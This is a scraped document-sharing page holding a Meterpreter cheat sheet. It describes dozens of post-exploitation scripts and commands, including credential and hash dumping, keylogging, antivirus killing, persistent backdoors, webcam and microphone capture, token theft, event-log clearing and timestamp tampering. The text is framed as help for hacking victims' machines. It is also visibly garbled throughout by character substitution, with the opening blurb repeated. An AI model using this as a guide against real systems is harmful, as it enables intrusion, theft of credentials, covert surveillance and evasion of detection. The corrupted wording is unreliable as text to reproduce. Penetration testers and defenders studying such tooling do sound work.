0 evaluări0% au considerat acest document util (0 voturi)
51 vizualizări9 pagini
Meterpreter is an incredible hacking and pentesting tool. In recent years, numerous hackers and security pros have developed scripts. This list attempts to provide you with a complete list of scripts as of this writing.
Meterpreter is an incredible hacking and pentesting tool. In recent years, numerous hackers and security pros have developed scripts. This list attempts to provide you with a complete list of scripts as of this writing.
Meterpreter is an incredible hacking and pentesting tool. In recent years, numerous hackers and security pros have developed scripts. This list attempts to provide you with a complete list of scripts as of this writing.
Metasploit framework is an incredible hacking and pentesting tool that every
hacker worth their salt should be conversant and capable on. In a previous post, I had provided you a cheat sheet of meterpreter commands. These commands are essential to running Metasploit's meterpreter, but in recent years, numerous hackers and security pros have developed scripts that we can run from the meterpreter that can be much more eective and malicious. In this post, I will try to provide you the most complete list and description available anywhere on the web. !ou will want to bookmark this page too, as no one remembers all these scripts and it's likely you will want to return here at a later time to "nd a particular script for a particular hack. #lease note that new meterpreter scripts are being developed every day. This list attempts to provide you with a complete list of scripts as of this writing. If you "nd errors or typos, please feel free to post them here, so I will try correct them as soon as humanly possible. $cript %ommands with &rief 'escriptions arp(scanner.rb ) $cript for performing an *+#'s $can 'iscovery. autoroute.rb ) Meterpreter session without having to background the current session. checkvm.rb ) $cript for detecting if target host is a virtual machine. credcollect.rb ) $cript to harvest credentials found on the host and store them in the database. domain(list(gen.rb ) $cript for e,tracting domain admin account list for use. dumplinks.rb ) 'umplinks parses .lnk "les from a user's recent documents folder and Microsoft -.ce's +ecent documents folder, if present. The .lnk "les contain time stamps, "le locations, including share names, volume serial /s and more. This info may help you target additional systems. duplicate.rb ) 0ses a meterpreter session to spawn a new meterpreter session in a dierent process. * new process allows the session to take 1risky1 actions that might get the process killed by *23, giving a meterpreter session to another controller, or start a keylogger on another process. enum(chrome.rb ) $cript to e,tract data from a chrome installation. enum("refo,.rb ) $cript for e,tracting data from 4irefo,. enum(logged(on(users.rb ) $cript for enumerating current logged users and users that have logged in to the system. enum(powershell(env.rb ) 5numerates #ower$hell and W$6 con"gurations. enum(putty.rb ) 5numerates #utty connections. enum(shares.rb ) $cript for 5numerating shares oered and history of mounted shares. enum(vmware.rb ) 5numerates 3Mware con"gurations for 3Mware products. event(manager.rb ) $how information about 5vent 7ogs on the target system and their con"guration. "le(collector.rb ) $cript for searching and downloading "les that match a speci"c pattern. get(application(list.rb ) $cript for e,tracting a list of installed applications and their version. getcountermeasure.rb ) $cript for detecting *3, 6I#$, Third #arty 4irewalls, '5# %on"guration and Windows 4irewall con"guration. #rovides also the option to kill the processes of detected products and disable the built)in "rewall. get(env.rb ) $cript for e,tracting a list of all $ystem and 0ser environment variables. get"le8illacreds.rb ) $cript for e,tracting servers and credentials from 4ile8illa. getgui.rb ) $cript to enable Windows +'#. get(local(subnets.rb ) 9et a list of local subnets based on the host's routes. get(pidgen(creds.rb ) $cript for e,tracting con"gured services with username and passwords. gettelnet.rb ) %hecks to see whether telnet is installed. get(valid(community.rb ) 9ets a valid community string from $:M#. getvncpw.rb ) 9ets the 3:% password. hashdump.rb ) 9rabs password hashes from the $*M. hostedit.rb ) $cript for adding entries in to the Windows 6osts "le. keylogrecorder.rb ) $cript for running keylogger and saving all the keystrokes. killav.rb ) Terminates nearly every antivirus software on victim. metsvc.rb ) 'elete one meterpreter service and start another. migrate ) Moves the meterpreter service to another process. multicommand.rb ) $cript for running multiple commands on Windows ;<<=, Windows 3istaand Windows ># and Windows ;<<? targets. multi(console(command.rb ) $cript for running multiple console commands on a meterpreter session. multi(meter(in@ect.rb ) $cript for in@ecting a reverce tcp Meterpreter #ayload into memory of multiple #I's, if none is provided a notepad process will be created and a Meterpreter #ayload will be in@ected in to each. multiscript.rb ) $cript for running multiple scripts on a Meterpreter session. netenum.rb ) $cript for ping sweeps on Windows ;<<=, Windows 3ista, Windows ;<<? and Windows ># targets using native Windows commands. packetrecorder.rb ) $cript for capturing packets in to a #%*# "le. panda;<<ApavsrvBC.rb ) This module e,ploits a privilege escalation vulnerability in #anda *ntivirus ;<<A. 'ue to insecure permission issues, a local attacker can gain elevated privileges. persistence.rb ) $cript for creating a persistent backdoor on a target host. pml(driver(con"g.rb ) 5,ploits a privilege escalation vulnerability in 6ewlett)#ackard's #M7 'river 6#DC;. 'ue to an insecure $5+3I%5(%6*:95(%-:4I9 '*%7 permission, a local attacker can gain elevated privileges. powerdump.rb ) Meterpreter script for utili8ing purely #ower$hell to e,tract username and password hashes through registry keys. This script reEuires you to be running as system in order to work properly. This has currently been tested on $erver ;<<? and Windows A, which installs #ower$hell by default. prefetchtool.rb ) $cript for e,tracting information from windows prefetch folder. process(memdump.rb ) $cript is based on the paper :eurosurgery With Meterpreter. remotewinenum.rb ) This script will enumerate windows hosts in the target environment given a username and password or using the credential under which Meterpeter is running using WMI wmic windows native tool. scheduleme.rb ) $cript for automating the most common scheduling tasks during a pentest. This script works with Windows >#, Windows ;<<=, Windows 3ista and Windows ;<<?. schelevator.rb ) 5,ploit for Windows 3ista2A2;<<? Task $cheduler ;.< #rivilege 5scalation. This script e,ploits the Task $cheduler ;.< >M7 <day e,ploited by $tu,net. schtasksabuse.rb ) Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. 0sing schtasks command to run them as system. This script works with Windows >#, Windows ;<<=, Windows 3ista and Windows ;<<?. scraper.rb ) The goal of this script is to obtain system information from a victim through an e,isting Meterpreter session. screenspy.rb ) This script will open an interactive view of remote hosts. !ou will need 4irefo, installed on your machine. screen(unlock.rb ) $cript to unlock a windows screen. :eeds system privileges to run and known signatures for the target system. screen(dwld.rb ) $cript that recursively search and download "les matching a given pattern. service(manager.rb ) $cript for managing Windows services. service(permissions(escalate.rb This script attempts to create a service, then searches through a list of e,isting services to look for insecure "le or con"guration permissions that will let it replace the e,ecutable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the ne,t time the service is started Fsuch as on rebootG the attacker will gain elevated privileges. sound(recorder.rb ) $cript for recording in intervals the sound capture by a target host microphone. srt(webdrive(priv.rb ) 5,ploits a privilege escalation vulnerability in $outh +iver Technologies Web'rive. uploade,ec.rb ) $cript to upload e,ecutable "le to host. virtualbo,(sysenter(dos ) $cript to 'o$ 3irtual &o,. virusscan(bypass.rb ) $cript that kills Mcafee 3irus$can 5nterprise v?.A.<iH processes. vnc.rb ) Meterpreter script for obtaining a Euick 3:% session. webcam.rb ) $cript to enable and capture images from the host webcam. win=;)sshclient.rb ) $cript to deploy I run the 1plink1 commandline ssh)client. $upports only M$)Windows);k2>#23ista 6osts. win=;)sshserver.rb ) $cript to deploy and run -pen$$6 on the target machine. winbf.rb ) 4unction for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment. winenum.rb ) 5numerates Windows system including environment variables, network interfaces, routing, user accounts, etc wmic.rb ) $cript for running WMI% commands on Windows ;<<=, Windows 3ista and Windows ># and Windows ;<<? targets. $tep CJ %ore %ommands *t its most basic use, meterpreter is a 7inu, terminal on the victim's computer. *s such, many of our basic 7inu, commands can be used on the meterpreter even if it's on a Windows or other operating system. 6ere are some of the core commands we can use on the meterpreter. K ) help menu background ) moves the current session to the background bgkill ) kills a background meterpreter script bglist ) provides a list of all running background scripts bgrun ) runs a script as a background thread channel ) displays active channels close ) closes a channel e,it ) terminates a meterpreter session help ) help menu interact ) interacts with a channel irb ) go into +uby scripting mode migrate ) moves the active process to a designated #I' Euit ) terminates the meterpreter session read ) reads the data from a channel run ) e,ecutes the meterpreter script designated after it use ) loads a meterpreter e,tension write ) writes data to a channel $tep ;J 4ile $ystem %ommands cat ) read and output to stdout the contents of a "le cd ) change directory on the victim del ) delete a "le on the victim download ) download a "le from the victim system to the attacker system edit ) edit a "le with vim getlwd ) print the local directory getwd ) print working directory lcd ) change local directory lpwd ) print local directory ls ) list "les in current directory mkdir ) make a directory on the victim system pwd ) print working directory rm ) delete a "le rmdir ) remove directory on the victim system upload ) upload a "le from the attacker system to the victim $tep =J :etworking %ommands ipcon"g ) displays network interfaces with key information including I# address, etc. portfwd ) forwards a port on the victim system to a remote service route ) view or modify the victim routing table $tep LJ $ystem %ommands clearav ) clears the event logs on the victim's computer drop(token ) drops a stolen token e,ecute ) e,ecutes a command getpid ) gets the current process I' F#I'G getprivs ) gets as many privileges as possible getuid ) get the user that the server is running as kill ) terminate the process designated by the #I' ps ) list running processes reboot ) reboots the victim computer reg ) interact with the victim's registry rev;self ) calls +evertTo$elfFG on the victim machine shell ) opens a command shell on the victim machine shutdown ) shuts down the victim's computer steal(token ) attempts to steal the token of a speci"ed F#I'G process sysinfo ) gets the details about the victim computer such as -$ and name $tep BJ 0ser Interface %ommands enumdesktops ) lists all accessible desktops getdesktop ) get the current meterpreter desktop idletime ) checks to see how long since the victim system has been idle keyscan(dump ) dumps the contents of the software keylogger keyscan(start ) starts the software keylogger when associated with a process such as Word or browser keyscan(stop ) stops the software keylogger screenshot ) grabs a screenshot of the meterpreter desktop set(desktop ) changes the meterpreter desktop uictl ) enables control of some of the user interface components $tep MJ #rivilege 5scalation %ommands getsystem ) uses CB built)in methods to gain sysadmin privileges $tep AJ #assword 'ump %ommands hashdump ) grabs the hashes in the password F$*MG "le :ote that hashdump will often trip *3 software, but there are now two scripts that are more stealthy, 1run hashdump1 and 1run smart(hashdump1. 7ook for more on those on my upcoming meterpreter script cheat sheet. $tep ?J Timestomp %ommands timestomp ) manipulates the modify, access, and create attributes of a "le